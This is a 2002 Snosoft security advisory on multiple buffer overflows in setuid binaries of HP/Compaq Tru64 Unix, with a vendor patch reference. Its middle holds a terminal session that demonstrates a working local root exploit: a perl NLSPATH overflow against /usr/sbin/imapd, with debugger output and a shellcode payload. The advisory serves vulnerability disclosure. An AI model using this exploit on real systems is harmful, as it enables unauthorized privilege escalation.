====================================================================== Strategic Reconnaissance Team Security Advisory(SRT2002-09) Topic: Compaq Tru64 Unix Mulitple Buffer Overflows Vendor: HP/Compaq Release Date: 09/04/2002 Author: stripey@snosoft.com Primary Research by: stripey@snosoft.com ====================================================================== .: Description The Tru64 operating system produced by HP/Compaq contains multiple buffer overflows in multiple system libraries and binaries. Tru64 is now shipped with its non-exec stack implementation enabled by default. This measure is intended to mitigate the risk presented by buffer overflow conditions in setuid binaries - However, it has been proven to be ineffective in preventing an attacker gaining increased priviliges through traditional avenues of exploitation. Affected binaries include: /usr/dt/bin/dtprintinfo /usr/dt/bin/dtsession /usr/dt/bin/dtaction /usr/dt/bin/dtterm /usr/bin/X11/dxsysinfo /usr/bin/X11/dxconsole /usr/bin/X11/dxpause /usr/bin/X11/dxterm /usr/tcb/bin/dxchpwd /usr/tcb/bin/edauth /usr/sbin/imapd /usr/bin/mh/msgchk /usr/bin/mh/inc /usr/bin/deliver /usr/bin/rdist /usr/bin/uucp /usr/bin/uux /usr/bin/su Here is a quick look at how one of these issues can be exploited. It should be fairly self explanatory. % uname -a OSF1 alpha.snosoft.com V5.1 732 alpha % id uid=208(stripey) gid=15(users) % ls -la /usr/sbin/imapd -rws--x--x 1 root bin 789216 Aug 24 2000 /usr/sbin/imapd % perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("/usr/sbin/imapd")' Segmentation fault % su Password: # cp /usr/sbin/imapd test # chmod a+r test # exit % perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("dbx","./test")' (dbx) r signal Segmentation fault at warning: PC value 0x504030200 not valid, trying RA warning: RA value 0x504030200 not valid, trying text start warning: text start 0x120000000 not valid, trying data start warning: Using data start as a text address -- traceback will not work > [., 0x140000000] call_pal cflush (dbx) 0x140014280/2X 0x0000000140014280: 0x4141414141414141 0x4141414141414141 (dbx) q % perl -e'$ENV{"NLSPATH"}=(pack("l",0x47ff041f)x227).(`./sc`).pack("ll",0x40014280,0x1);exec("/usr/sbin/imapd")' # id uid=208(stripey) gid=15(users) euid=0(root) # .: Impact A local unpriviliged user can obtain increased permissions regardless of the non-exec stack flag. .: Workaround HP/Compaq has provided the following advisory and patches: HP Advisory Ref: SSRT2257 http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11 .: Systems Affected The following systems are known to be affected by some or all of these issues: Tru64 5.1 Tru64 5.1A DgUX 4.0 .: Proof of Concept See http://www.snosoft.com/research in a few days. .: Vendor Status Vendor informed, patches available. .: References HP Advisory Ref: SSRT2257 .: Credit I can not stress enough the amount of dedication and hard work stripey has put into this project. None of this would be possible without hours upon hours of diligent work from stripey@snosoft.com .: DISCLAIMER Snosoft is in no way responsible for the use or abuse of the provided information. The Compaq end user is responsible for his or her own local and remote security. That file you've been guarding, isn't. ------------------------------------------------------------------- ______________________________ / _____/\______ \__ ___/ | Secure Network Operations \_____ \ | _/ | | | http://www.snosoft.com / \ | | \ | | | recon@snosoft.com /_______ / |____|_ / |____| | \/ \/ | Project Cerebrum